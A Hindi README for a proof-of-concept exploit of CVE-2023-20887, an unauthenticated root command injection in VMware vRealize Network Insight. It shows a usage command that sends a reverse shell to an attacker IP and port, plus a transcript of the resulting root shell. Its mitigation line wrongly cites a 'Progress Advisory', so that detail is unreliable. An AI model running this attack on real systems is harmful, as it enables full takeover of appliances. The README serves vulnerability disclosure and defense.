
VMWare vRealize Network Insight पूर्व-प्रमाणित RCE (CVE-2023-20887)
CVE-2023-20887 VMWare Aria Operations for Networks (vRealize Network Insight) अप्रमाणित RCE के लिए POC
इस कमज़ोरी का मूल कारण विश्लेषण मेरे ब्लॉग पर पाया जा सकता है: https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

VMWare Aria Operations for Networks (vRealize Network Insight) Apache Thrift RPC इंटरफ़ेस के माध्यम से उपयोगकर्ता इनपुट स्वीकार करते समय कमांड इंजेक्शन के प्रति संवेदनशील है। यह कमज़ोरी एक दूरस्थ अप्रमाणित हमलावर को अंतर्निहित ऑपरेटिंग सिस्टम पर root उपयोगकर्ता के रूप में मनमाने कमांड निष्पादित करने की अनुमति देती है। RPC इंटरफ़ेस एक रिवर्स प्रॉक्सी द्वारा सुरक्षित है जिसे बायपास किया जा सकता है। VMware ने इस मुद्दे की गंभीरता का मूल्यांकन अधिकतम CVSSv3 आधार स्कोर 9.8 के साथ क्रिटिकल गंभीरता श्रेणी में किया है। एक दुर्भावनापूर्ण अभिनेता उपकरण पर 'root' के संदर्भ में रिमोट कोड निष्पादन प्राप्त कर सकता है। VMWare 6.x संस्करण कमज़ोर हैं।
python CVE-2023-20887.py --url https://192.168.116.100 --attacker 192.168.116.1:1337
VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) Starting handler
(+) Received connection from 192.168.116.100
(+) pop thy shell! (it's ready)
sudo bash
id
uid=0(root) gid=0(root) groups=0(root)
hostname
vrni-platform-release
नवीनतम संस्करण में अपडेट करें या Progress Advisory के निर्देशों का पालन करके शमन करें
यह सॉफ़्टवेयर पूर्ण रूप से अकादमिक अनुसंधान और प्रभावी रक्षात्मक तकनीकों के विकास के उद्देश्य से बनाया गया है, और स्पष्ट रूप से अधिकृत किए जाने के अलावा सिस्टम पर हमला करने के लिए इसका उपयोग करने का इरादा नहीं है। परियोजना के अनुरक्षक सॉफ़्टवेयर के दुरुपयोग के लिए ज़िम्मेदार या उत्तरदायी नहीं हैं। ज़िम्मेदारी से उपयोग करें।